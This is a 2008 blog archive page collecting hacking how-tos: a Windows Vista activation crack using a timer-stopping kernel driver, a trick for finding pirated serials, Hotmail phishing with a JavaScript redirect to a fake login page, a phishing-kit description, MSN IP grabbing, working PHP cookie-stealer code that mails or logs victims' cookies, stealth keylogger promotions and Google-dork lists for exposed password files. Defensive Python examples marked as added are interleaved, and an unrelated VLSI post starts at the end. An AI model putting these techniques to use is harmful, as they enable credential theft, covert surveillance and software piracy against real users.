Sunday, November 2, 2008

how to crack windows vista?


  1. Install Windows Vista Ultimate edition (or other edition) without product key.
  2. Apply the 2099-ReArm trick to Windows Vista so that the counter of minutes left in the no-activation-required period does not return to normal after a reboot. Click on the Start Orb button.
  3. Select “All Programs”, then “Accessories”.
  4. Right-click on “Command Prompt”, then select “Run as Administrator (A)”.
  5. If User Account Control (UAC) prompts a warning message, click on “Continue”.
  6. In the command prompt, type date and press Enter. You will see the following:

    Microsoft Windows [Version 6.0.6000]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>date
    Current date: 12/19/2006 Thursday
    Enter new date:
  7. Enter 12/31/2099 (December 31, 2099).
  8. Next, type cscript slmgr.vbs -rearm. You will see something like the following:

    C:\Windows\system32>cscript slmgr.vbs -rearm
    Microsoft (R) Windows Script Host Version 5.7
    Copyright (C) Microsoft Corporation. All rights reserved.

    The command completed successfully.
    To make the change effectively, please restart the system.
  9. Then reset the system date to the current date by typing date again. You will see the following:

    Microsoft Windows [Version 6.0.6000]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>date
    Current date: 12/31/2099 Thursday
    Enter new date:
  10. Type in the current date, i.e. 12/19/2006.
  11. Exit from the command prompt, but do not restart the computer.
  12. Download StopTimer.zip or the StopTimer.zip torrent.
  13. Extract the downloaded archive file into a folder. It should contain “Vista test crack.exe” and “timerstop.sys”.
  14. Run “Vista test crack.exe” by right-clicking on it and selecting “Run as Administrator (A)”.
  15. Optional: Press the Test button, and a message will pop up saying that 4 timers are stopped. At this point the counter should be frozen. Check with the slmgr.vbs -dlv command: the minutes left should be the same after an interval of a few minutes. If that is the case, continue with the following steps to run the crack at every startup.
  16. In the Vista test crack window, click on the “Install” button. You will be prompted with a “Service installed” message if everything is done properly and correctly. The crack will copy the patched stoptimer.sys to the system folder and install a new service named “timerstop” to stop kernel-mode timers in the spsys.sys system file.
  17. Exit from the crack, and restart the computer.
  18. The hacking is basically done. The next few steps verify that the activation grace period’s built-in countdown timer is actually stopped, that the timers are disabled from working properly, and that the crack is installed properly. After restart, log on to Windows Vista. Run for a few minutes.
  19. Press the Windows + R keys.
  20. Type slmgr.vbs -dlv to check the time left to activate Windows Vista. If the time left is 43200 minutes, that means the crack is successful.


With the crack, you will have the following in the registry:


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
    "Type"=dword:00000001
    "Start"=dword:00000002
    "ErrorControl"=dword:00000000
    "ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\
      64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
      00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\
      79,00,73,00,00,00
    "DisplayName"="TimerStop"
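
The registry entry above is the artifact an administrator or responder can look for. The following is an added example, not part of the original post or of the tool it describes: it decodes the hex(2) (UTF-16LE) ImagePath from such an export and reports auto-loaded kernel driver services. The function names and the "outside the drivers directory" heuristic are assumptions of this example.

```python
import re

# The export shown above, retyped with straight quotes (sample input for this example).
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
"Type"=dword:00000001
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\
  64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
  00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\
  79,00,73,00,00,00
"DisplayName"="TimerStop"
'''

SERVICE_TYPES = {0x1: "kernel driver", 0x2: "file system driver",
                 0x10: "own-process service", 0x20: "shared-process service"}
START_TYPES = {0: "boot", 1: "system", 2: "automatic", 3: "manual", 4: "disabled"}


def decode_value(raw):
    """Decode one .reg value: dword, hex(1)/hex(2) UTF-16LE string, or quoted string."""
    raw = raw.strip()
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    m = re.match(r"hex\(([0-9a-f]+)\):(.*)$", raw, re.I)
    if m and m.group(1) in ("1", "2"):   # REG_SZ / REG_EXPAND_SZ stored as raw bytes
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        return data.decode("utf-16-le").rstrip("\x00")
    return raw.strip('"')


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: decoded_value}}."""
    text = text.replace("\u201c", '"').replace("\u201d", '"')  # curly quotes from web copies
    text = re.sub(r"\\\r?\n[ \t]*", "", text)                  # join "\"-continued hex lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None:
            m = re.match(r'"([^"]+)"=(.*)$', line)
            if m:
                current[m.group(1)] = decode_value(m.group(2))
    return keys


def audit_services(keys):
    """Summarise each service key; flag drivers that load automatically."""
    findings = []
    for path, values in keys.items():
        _, sep, name = path.rpartition("\\Services\\")
        if not sep or "\\" in name or not isinstance(values.get("Type"), int):
            continue
        image = values.get("ImagePath", "")
        kind = SERVICE_TYPES.get(values["Type"], hex(values["Type"]))
        findings.append({
            "service": name,
            "kind": kind,
            "start": START_TYPES.get(values.get("Start"), "unknown"),
            "image": image,
            "auto_loaded": kind.endswith("driver") and values.get("Start") in (0, 1, 2),
            # Heuristic (assumption): a driver image outside a \drivers\ directory deserves a look.
            "outside_drivers_dir": "\\drivers\\" not in image.lower(),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_services(parse_reg(REG_EXPORT)):
        print(finding)
```

The decoded path shows that the export was taken on a machine with Windows installed on drive E:, so match on the service name and file name rather than on the full path.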


Further information:
  • The TimerStop Vista test crack works on all 32-bit x86 Windows Vista editions such as Vista Ultimate and Vista Home Premium. Success rate in a 64-bit (x64) environment is likely to be low.
  • The crack will make the time left to activate Vista always 43200 minutes (30 days); it will not count down or reduce.
  • It’s possible to access Windows Update if you install Windows Vista with the default product key (no product key entered during installation).
  • During the first 3 days of the activation grace period after installing Windows Vista, Microsoft has designed it in such a way that Vista allows the greatest flexibility for users to install required drivers and applications, so Vista won’t prompt any reminder message for activation. After the crack, the Vista OS will always run with 30 days left for activation, thus there will not be any watermark or reminder to activate.
  • It’s possible to pass Windows Vista Genuine Advantage (WVGA) validation, so users are able to download Microsoft value-added software for genuine customers.
  • As mentioned above, as Vista will also remain in the first 3 days of the activation grace period, in theory Microsoft will not be able to differentiate between a newly installed system and a ‘patched’ system, unless of course they check for the specific file or system (privacy anyone?).
  • Users can only see in the system properties that there are 30 more days for the system to be activated, but it won’t affect system usage or installation method.




Disclaimer: This article is for educational and informational purposes only.


hacking techniques - update 1

Most people download a trial and use it; only after the trial expires do they look for a crack, serial number, keygen, patch....

But many don't know where to get a serial number. Some websites may infect your system with Trojan horses, viruses, adware, spyware....

So for beginners this is a simple way to find a hack with less effort, and it saves time too. But make sure you have antivirus activated before trying to get serials or patches, to avoid data loss.

Just follow the steps as instructed below

1) Go to http://www.google.com

2) type this syntax in search bar " 94FBR"

3) Replace Product name with desired software and leave a space then type 94FBR

4) Press Enter, that's it

Now you receive many pages which contain serial numbers, cracks, patches....

Just give it a try; this simple trick works for many people.

HACKING HOTMAIL

Introduction

We all use Hotmail! Well, it's one of my favorites.
Here I'm going to reveal and alert you about how unethical hackers can cheat us.

This page is meant for educational purposes only. I do not endorse hacking at all; it's meant for knowing the threats, protecting yourself, and also curbing them.

Topics

1:- How Hotmail can be hacked with a fake login screen (2 different ways)
2:- Fake e-mail threats
3:- Detect a fake message in Hotmail
4:- How to get a person's IP address through MSN Messenger
5:- Curbing the way hackers get the passwords
6:- Easiest way
7:- Change MSN Messenger title
8:- Protect yourself from viruses
9:- Hoax Toolbox v1.1

1) Protect yourself from Phishing

Usually the unethical hackers upload their fake Hotmail login screen to a web server and then send the following code to the victim from Yahoo or another mail-sending program. The code is:

script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"
< /script>

The user is then automatically redirected from their e-mail box to the fake Hotmail screen, and the account is hacked.
Beware of these threats.

2) Beware of Fake Login Screens

They start chatting with the victim, send the fake login screen through their messenger, and try to phish you.
There are many of them available on the net, usually small Visual Basic programs. Never reveal your password anywhere other than the latest versions of MSN Messenger.

3) Fake e-mails threats

This is very easy: go to http://www.boxfrog.com/ and register (it's blocked now, but there are many others; search Google and you'll find many), click on create message, type anyone's e-mail address in the From field, and the message will be sent.
There's also a simple way of doing this by telnetting from the DOS prompt.
Beware of this threat: make your spam protection powerful.

4) Detect a fake message in the Hotmail inbox

This is simple, buddies. Open your e-mail box, go to Options, and select display settings or message display settings (or something like this). Now select Full where it says message display settings, or something like this. Open the mail which you think is fake. At the end, where it says From, you can see the address of the site from which the mail was sent; but if someone has sent it through some sort of program, it will tell you his IP. Once you know the IP, I'm sure you know how to go on from there.
IMP: Read the IP address log backwards.
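
Reading the full headers "backwards" means walking the Received lines from the bottom up, because every relay adds its own line on top. The following is an added example, not from the original post: it parses a constructed message and separates the hop recorded by your own mail server (reliable) from the earlier hops (which the sender could have forged). The sample message, the `trusted_suffix` parameter and the function names are assumptions of this example.

```python
import email
import re
from email.utils import parseaddr

# Constructed sample: a message claiming to come from hotmail.com.
# All host names and IP addresses are documentation values.
SAMPLE = """\
Received: from mx.recipient.example (mx.recipient.example [192.0.2.10])
    by inbox.recipient.example with ESMTP id A1; Sun, 2 Nov 2008 10:00:05 +0000
Received: from relay.sender-isp.example (relay.sender-isp.example [198.51.100.7])
    by mx.recipient.example with ESMTP id B2; Sun, 2 Nov 2008 10:00:03 +0000
Received: from webform (dsl-203-0-113-45.sender-isp.example [203.0.113.45])
    by relay.sender-isp.example with HTTP; Sun, 2 Nov 2008 10:00:01 +0000
From: "Hotmail Support" <support@hotmail.com>
To: user@recipient.example
Subject: Verify your account

Please confirm your password.
"""

# "from HELO (reverse-dns [ip])" as written by common mail servers.
HOP_RE = re.compile(r"from\s+(\S+)\s+\(([^\s\[\]()]*)\s*\[([0-9A-Fa-f:.]+)\]\)")


def trace_hops(raw_message):
    """Return (message, hops) with hops ordered from earliest to latest."""
    msg = email.message_from_string(raw_message)
    hops = []
    # Each relay prepends its Received line, so the bottom header is the earliest hop.
    for value in reversed(msg.get_all("Received", [])):
        m = HOP_RE.search(value)
        by = re.search(r"\bby\s+(\S+)", value)
        hops.append({
            "helo": m.group(1) if m else None,
            "rdns": (m.group(2) or None) if m else None,
            "ip": m.group(3) if m else None,
            "by": by.group(1) if by else None,
        })
    return msg, hops


def assess(raw_message, trusted_suffix):
    """Compare the claimed sender with the hop where the mail entered our servers."""
    msg, hops = trace_hops(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    # First hop written by a server we run: the only Received line we can fully trust.
    handoff = next((h for h in hops
                    if h["by"] and h["by"].lower().endswith(trusted_suffix)), None)
    origin = next((h for h in hops if h["ip"]), None)
    rdns = (handoff["rdns"] or "").lower() if handoff else ""
    return {
        "claimed_from_domain": from_domain,
        "claimed_origin_ip": origin["ip"] if origin else None,   # may be forged
        "handoff_host": rdns or None,
        "handoff_ip": handoff["ip"] if handoff else None,
        "from_matches_handoff": rdns == from_domain or rdns.endswith("." + from_domain),
    }


if __name__ == "__main__":
    print(assess(SAMPLE, "recipient.example"))
```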

5) Protect yourself from revealing your IP address through MSN Messenger

When you open your messenger and start chatting with a friend, open MS-DOS and type netstat -n there; do not press Enter, and then minimize it. After this, send something to your victim, and as soon as he accepts it the Hotmail messenger will say connecting. This is the time when you re-maximize your MS-DOS window and press Enter. The IP address next to “time wait” will be the friend's IP. You may be hacked the same way.

Beware!!

HoaX Toolbox v1.1

This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail. Once you set up the script on a server that has PHP and SQL, you will be able to log in to the administration page and choose the fake login page to display on the main site. When the victim tries to log in to their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area. If the victim is not stupid enough to enter their real login, because they read the URL of your server instead of hotmail.com or yahoo.com in the URL bar, then remember you can pop up the main page of the site and disable the URL bar on the explorer, so when the user clicks the link "Yahoo Mail" on your real site, an explorer without a URL bar pops up. If you don't know how to pop up customized browsers, search Google.


Hacking MSN


Small yet working trick
Hacking MSN is actually VERY simple. MSN is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth, so a direct connection is made. This is your chance. Make a file transfer occur between you and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into the prompt) and run netstat. Usually the MSN target's IP would be above port 2000. Enjoy.
If you receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely; mostly you will receive a clear IP.

Once you have the IP you can do anything with him by fingerprinting.

You can protect yourself from this happening to you by using a proxy with MSN (under the connections panel in options).

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essence, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpreted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
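
Both halves of the technique above depend on the site: the sender only works if posted markup is rendered unescaped, and it can only read cookies that are not marked HttpOnly. The following is an added example, not from the original text: it audits Set-Cookie headers for what a page script could read and escapes user-posted content before display. The sample headers and function names are constructed for illustration, and cookie path and domain matching is ignored.

```python
import html

# Constructed Set-Cookie headers, as a site might send them after login.
SAMPLE_HEADERS = [
    "SESSIONID=3f9a1c; Path=/",
    "auth=tok123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; Expires=Wed, 02 Nov 2011 10:00:00 GMT",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes)."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True   # flags have no value
    return name.strip(), value.strip(), attrs


def script_visible_cookies(headers):
    """The string a page script would get from document.cookie.

    Browsers leave HttpOnly cookies out of document.cookie, so only the
    remaining ones can be appended to a URL by an injected script.
    """
    visible = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            visible.append(f"{name}={value}")
    return "; ".join(visible)


def audit_cookies(headers):
    """Map each cookie name to the list of missing protections."""
    report = {}
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        issues = []
        if "httponly" not in attrs:
            issues.append("readable by page scripts (no HttpOnly)")
        if "secure" not in attrs:
            issues.append("sent over plain HTTP (no Secure)")
        report[name] = issues
    return report


def render_post(user_text):
    """Escape user-posted text so the browser shows it instead of running it."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


if __name__ == "__main__":
    print(script_visible_cookies(SAMPLE_HEADERS))
    print(audit_cookies(SAMPLE_HEADERS))
    print(render_post('<script>document.title = "x"</script>'))
```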

Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as a trojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

Let's look at some of the keyloggers I know of.

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.


XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detect specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. All this is happening in full stealth mode so the person you are monitoring will never be aware of it. {Windows 95, NT4, 98, Me, 2000, XP}



Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager!


SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.



Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible. Specify log file location. Uses a WH_JOURNALRECORD hooking procedure to capture everything typed. Hide and unhide the interface by pressing Ctrl+Shift+F7.


Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is a stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and Windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.

The Google search engine can be used to hack into remote servers or gather confidential or sensitive information which is not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produce unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various special Google commands. I shall explain each command in brief and show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password

will return links to those pages that have the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title, then “allintitle:” can be used instead of “intitle:” to get the list of pages containing all those words in their title.

intitle: login intitle: password


is the same as

allintitle: login password

[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in a URL, then “allinurl:” can be used instead of “inurl:” to get the list of URLs containing all those search keywords.

allinurl: etc/passwd

will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com
will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

The “filetype:” syntax restricts a Google search to files on the internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential


will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.


[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com


will list webpages that have links pointing to the www.expertsforge.com homepage. Note there can be no space between the "link:" and the web page URL.


[ related: ]

The “related:” syntax will list web pages that are "similar" to a specified web page.

related:www.expertsforge.com

will list web pages that are similar to the www.expertsforge.com homepage. Note there can be no space between the "related:" and the web page URL.

[ cache: ]

The query “cache:” will show the version of the web page that Google has in its cache.

cache:www.hackingspirits.com

will show Google's cache of the www.hackingspirits.com homepage. Note there can be no space between the "cache:" and the web page URL.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest


will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in the body text of a page. It ignores links or URLs and page titles.

intext:exploits


will return only links to those web pages that have the search keyword "exploits" in their page text.


[ phonebook: ]

“phonebook:” searches for U.S. street address and phone number information.

phonebook:Lisa+CA


will list all names of persons having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers in case someone wants to dig up personal information for social engineering.

Google Hacks

Well, the Google query syntaxes discussed above can really help people make their searches more precise and get exactly what they are looking for.

Now, Google being such an intelligent search engine, hackers don’t mind exploiting its ability to dig up confidential and secret information from the net which they are not supposed to know. Now I shall discuss in detail the techniques hackers use to dig information from the net using Google, and how that information can be used to break into remote servers.

Index Of

Using the “Index of” syntax to find sites with index browsing enabled

A webserver with index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of the “index of” syntax to get a list of links to webservers which have directory browsing enabled is discussed below. This becomes an easy source of information gathering for a hacker. Imagine if they get hold of password files or other sensitive files which are not normally visible to the internet. Given below are a few examples with which one can get access to much sensitive information easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"


Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.


b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list all the links to servers which give access to the “.bash_history” file through the web. This is a command history file. This file includes the list of commands executed by the administrator, and sometimes includes sensitive information such as passwords typed in by the administrator. If this file is compromised and if it contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list all the links to servers which give access to the “config.txt” file through the web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For example: Ingenium Learning Management System is a Web-based application for Windows-based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 store sensitive information insecurely in the config.txt file. For more information refer to the following link: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax


inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list the links to websites which have index browsing enabled for restricted directories like “admin” through the web. Many web applications use names like “admin” to store admin credentials. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
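
Every query above finds something only because a server publishes a directory listing or a sensitive file, so the same lists can be turned on your own document root before a search engine indexes it. The following is an added example, not from the original article: it walks a local web root and reports directories that would render as "Index of" listings and files whose names match the queries above. The index file names, the demo tree and the function names are assumptions of this example.

```python
import os
import tempfile

# File names, extensions and directory names taken from the queries listed above.
SENSITIVE_NAMES = {
    ".bash_history", ".sh_history", ".htaccess", "htpasswd", "passwd", "passwd.txt",
    "password.txt", "master.passwd", "pwd.db", "spwd", "shadow", "people.lst",
    "config.txt", "auth_user_file.txt", "orders.txt", "adpassword.txt",
}
SENSITIVE_EXTS = {".mdb", ".db", ".cfg"}
SENSITIVE_DIRS = {"admin", "secret", "confidential", "root", "cgi-bin",
                  "logs", "config", "mail", "credit-card"}
# Assumption: names the web server serves as a directory's default page.
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.htm", "default.asp"}


def audit_webroot(root):
    """Return sorted (url_path, reason) findings for a local document root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        url_dir = "/" if rel == "." else "/" + rel + "/"
        lower_names = {name.lower() for name in filenames}
        if not lower_names & INDEX_FILES:
            reason = "no index file: served as an 'Index of' listing if autoindex is on"
            if os.path.basename(dirpath).lower() in SENSITIVE_DIRS:
                reason += " (sensitive directory name)"
            findings.append((url_dir, reason))
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if name.lower() in SENSITIVE_NAMES:
                findings.append((url_dir + name, "sensitive file name"))
            elif ext in SENSITIVE_EXTS:
                findings.append((url_dir + name, "sensitive extension " + ext))
    return sorted(findings)


def build_demo_tree(root):
    """Create a small constructed document root for the demonstration."""
    for rel in ("index.html", ".bash_history", "admin/config.txt",
                "admin/users.mdb", "img/logo.png"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("demo\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_demo_tree(demo_root)
        for url_path, reason in audit_webroot(demo_root):
            print(url_path, "->", reason)
```

Fix each finding at the source: move the file out of the web root or deny access to it, and turn off directory listings (for example `Options -Indexes` on Apache).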

Thursday, October 23, 2008

Career in VLSI

PROLOGUE
Most of the students of Electronics Engineering are exposed to Integrated Circuits (IC's) at a very basic level, involving SSI (small scale integration) circuits like logic gates or MSI (medium scale integration) circuits like multiplexers, parity encoders etc. But there is a lot bigger world out there involving miniaturization at levels so great, that a micrometer and a microsecond are literally considered huge! This is the world of VLSI - Very Large Scale Integration. The article aims at trying to introduce to the possibilities and the work involved in this field.

INTRODUCTION
